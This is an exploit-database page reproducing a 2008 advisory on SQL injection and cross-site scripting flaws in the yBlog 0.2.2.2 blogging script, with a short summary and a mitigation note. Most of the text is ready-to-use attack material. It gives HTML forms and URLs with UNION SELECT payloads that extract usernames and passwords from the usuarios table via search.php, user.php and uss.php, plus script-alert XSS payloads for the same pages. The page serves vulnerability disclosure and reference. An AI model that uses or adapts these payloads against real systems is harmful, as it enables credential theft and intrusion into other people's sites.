header-logo
Suggest Exploit
vendor:
yBlog
by:
unohope
8.8
CVSS
HIGH
SQL Injection and Cross-Site Scripting
89 (SQL Injection) and 79 (Cross-Site Scripting)
CWE
Product Name: yBlog
Affected Version From: 0.2.2.2
Affected Version To: 0.2.2.2
Patch Exists: YES
Related CWE: N/A
CPE: a:yblog:yblog:0.2.2.2
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

yBlog 0.2.2.2 Multiple Remote Vulnerabilities

yBlog 0.2.2.2 is vulnerable to multiple remote vulnerabilities such as SQL Injection and Cross-Site Scripting. An attacker can exploit these vulnerabilities to gain access to sensitive information such as usernames and passwords, and execute malicious scripts on the vulnerable system.

Mitigation:

Apply the latest security patches and update the system to the latest version. Use input validation and output encoding to prevent malicious scripts from executing.
Source

Exploit-DB raw data:

  _____ _   _ _____  _____ _____ _____  
 /  ___| |_| |  _  \|  _  |  _  |_   _| 
 | (___|  _  | [_)_/| (_) | (_) | | |   
 \_____|_| |_|_| |_||_____|_____| |_|   
        C. H. R. O. O. T.  SECURITY  GROUP
        - -- ----- --- -- -- ---- --- -- - 
                     http://www.chroot.org

                          _   _ _ _____ ____ ____ __  _ 
        Hacks In Taiwan  | |_| | |_   _|  __|    |  \| |
        Conference 2008  |  _  | | | | | (__| () |     |
                         |_| |_|_| |_| \____|____|_|\__|
                                      http://www.hitcon.org


Title =======:: yBlog 0.2.2.2 Multiple Remote Vulnerabilities

Author ======:: unohope [at] chroot [dot] org

IRC =========:: irc.chroot.org #chroot

ScriptName ==:: yBlog

Download ====:: http://nchc.dl.sourceforge.net/sourceforge/y-blog/yblog-0.2.2.2.tar.gz

Mirror ======:: http://www.badongo.com/file/9705849

______________________
[SQL Injection]

- {search.php} -

<form action="http://localhost/yblog/search.php" method="post">
  <input type="hidden" name="q" value="' union select 0,1,2,3,usuario,5,6,7,8,9,10,password,12,13,14,15,16 from usuarios/*">
  <input type="submit" value="send">
</form>

<form action="http://localhost/yblog/search.php" method="post">
  <input type="hidden" name="cn" value="1">
  <input type="hidden" name="q" value="' union select 0,1,2,3,usuario,5,6,7,8,9,10,password,12,13,14,15,16 from usuarios/*">
  <input type="submit" value="send">
</form>

- {user.php} -

http://localhost/yblog/user.php?n=-99'+union+select+0,1,2,3,usuario,password,6,7,8,9,10,11,12,13,14,15,16+from+usuarios/*

- {uss.php} -

http://localhost/yblog/uss.php?action=2&done=1&n=-99'+union+select+0,1,2,usuario,password,5,6,7,8,9,10,11,12,13,14,15,16+from+usuarios+where+usuario='adm'/*

______________________
[Cross-Site Scripting]

- {search.php} -

<form action="http://localhost/yblog/search.php" method="post">
  <input type="hidden" name="q" value="<script>alert(/xss/)</script>">
  <input type="submit" value="send">
</form>

- {user.php} -

http://localhost/yblog/user.php?n=<script>alert(/xss/)</script>

- {uss.php} - 

http://localhost/yblog/uss.php?action=2&done=1&n=<script>alert(/xss/)</script>

______
[NOTE]

!! This is just for educational purposes, DO NOT use for illegal. !!

# milw0rm.com [2008-06-10]